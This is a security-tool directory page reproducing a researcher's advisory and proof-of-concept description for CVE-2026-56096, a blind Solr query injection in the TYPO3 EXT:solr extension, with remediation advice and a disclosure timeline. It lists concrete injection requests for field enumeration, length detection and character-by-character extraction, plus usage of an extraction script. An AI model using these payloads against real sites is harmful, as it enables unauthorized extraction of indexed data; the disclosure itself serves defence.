Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-56096 — Proof of concept and technical write-up for CVE-2026-56096, a blind Solr query injection in TYPO3 EXT:solr enabling unauthenticated field enumeration and data extraction. | Kitploit
도구/GitHubGitHub/yairhinkis/cve-2026-56096
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPapers & Research
GitHubyairhinkis/cve-2026-56096

CVE-2026-56096

Proof of concept and technical write-up for CVE-2026-56096, a blind Solr query injection in TYPO3 EXT:solr enabling unauthenticated field enumeration and data extraction.

저장소 보기
3369일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
요청한 언어로 콘텐츠를 사용할 수 없습니다. 영어 버전을 표시합니다.

CVE-2026-56096: Solr Query Injection & Blind Data Extraction in TYPO3 EXT:solr

An architectural security vulnerability was discovered in the official TYPO3 Apache Solr extension (EXT:solr / apache-solr-for-typo3/solr). The issue allows unauthenticated remote attackers to inject arbitrary Solr/Lucene query syntax via the search parameter tx_solr[q], enabling unauthorized blind field enumeration and full metadata extraction from the search index.


Metadata

  • CVE ID: CVE-2026-56096
  • Vulnerability Type: CWE-943: Improper Neutralization of Special Elements in Data Query Logic
  • Target Component: EXT:solr (Search parameter: tx_solr[q])
  • CVSS v4.0 Score: 6.3 (Medium) — CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
  • Researcher: Yair Hinkis

Vulnerability Overview

The EXT:solr extension accepts user-supplied search terms via the tx_solr[q] parameter and forwards them to the Apache Solr engine. By design, the extension allows specific query operators—such as wildcards (*), single-character wildcards (?), field selectors (:), and range queries ([a TO z])—to support legitimate functionality like faceted filtering.

Because these characters were passed directly to the backend query construction without an enforcing whitelist or query abstraction layer, an attacker can supply field-specific syntax to escape intended search boundaries. This allows unauthenticated users to query internal Solr fields directly and extract index data using boolean-based blind techniques.


Attack Techniques

1. Field Enumeration via field:*

By appending a wildcard to an arbitrary or guessed field name, an attacker can verify if the field exists within the schema:

GET /search?tx_solr[q]=siteHash:* HTTP/1.1
Host: target.example.com

If the field exists, Solr processes the query across all matching records (often triggering distinct response codes or volume-related behaviors), allowing automated wordlist-based field enumeration.


2. Blind Value Extraction via Prefix Wildcards

Attackers can extract sensitive field values character-by-character using boolean inference:

GET /search?tx_solr[q]=siteHash:a* HTTP/1.1  --> Returns search hits (Value begins with 'a')
GET /search?tx_solr[q]=siteHash:b* HTTP/1.1  --> "Nothing found" (Value does not begin with 'b')


3. Length Detection via the ? Operator

The single-character wildcard operator (?) can determine the exact length of a stored string before starting character iteration:

GET /search?tx_solr[q]=siteHash:????????????* HTTP/1.1   (Checks for 12+ characters)
GET /search?tx_solr[q]=siteHash:?????????????* HTTP/1.1  (Checks for 13+ characters)


4. Accelerated Range Queries ([a TO z])

Range queries permit binary-search extraction on the initial character, cutting down the requests needed from 26 to ~5 per character position:

GET /search?tx_solr[q]=siteHash:[a TO m] HTTP/1.1  --> Determines if character falls within 'a'-'m'
GET /search?tx_solr[q]=siteHash:[n TO z] HTTP/1.1  --> Determines if character falls within 'n'-'z'

Combining length detection, range queries, and prefix wildcards allows full field extraction with a minimal request footprint.


Proof of Concept / Usage

An automated verification script (poc.py) is provided to demonstrate blind extraction using the techniques outlined above.

Usage Example

python3 poc.py -u "https://target.example.com/?L=0&id=1" -f "someField"

Options

  • -u, --url: Target URL pointing to the TYPO3 search endpoint.

  • -f, --field: Schema field name to enumerate/extract (e.g., appKey, siteHash).

  • -c, --cookies: (Optional) Session cookies if authentication/WAF bypass verification is required.

  • -o, --output: Output file to store discovered prefixes (default: validated_fields.txt).


Impact

  • Confidentiality Violation: Full extraction of all fields indexed in Apache Solr (e.g., internal system hashes, hidden page content, user-related metadata, and system identifiers).
  • Access Control Bypass: Bypasses frontend search filters and TypoScript display restrictions.
  • Scope: Affected all default installations utilizing the EXT:solr search endpoint.

Remediation

Global character escaping is insufficient because operators like * and : serve intended search features. Remediation requires an application-layer whitelist and parsing model:

  1. Parse user-supplied query strings into an Abstract Syntax Tree (AST) before dispatching to the Solr engine.
  2. Enforce strict allowlists on permissible field targets, disallowing direct user queries against internal or restricted fields.
  3. Neutralize non-whitelisted operator abuse originating from untrusted input contexts.

Coordinated Disclosure Timeline

  • March 6, 2026: Identified vulnerability during an authorized assessment; initial vendor notification.
  • April 17, 2026: Vendor implemented local edge mitigations; confirmed upstream bug nature.
  • May 8, 2026: Formal vulnerability report submitted to the TYPO3 Security Team ([email protected]).
  • June 15, 2026: TYPO3 Security Team confirmed reproduction and initiated patch development with extension maintainers.
  • August 25, 2026: Official security bulletin issued, patch published, and CVE-2026-56096 assigned.

References

  • TYPO3 Security Advisory: TYPO3-EXT-SA-2026-025
  • CWE Definition: CWE-943: Improper Neutralization of Special Elements in Data Query Logic
도구 다운로드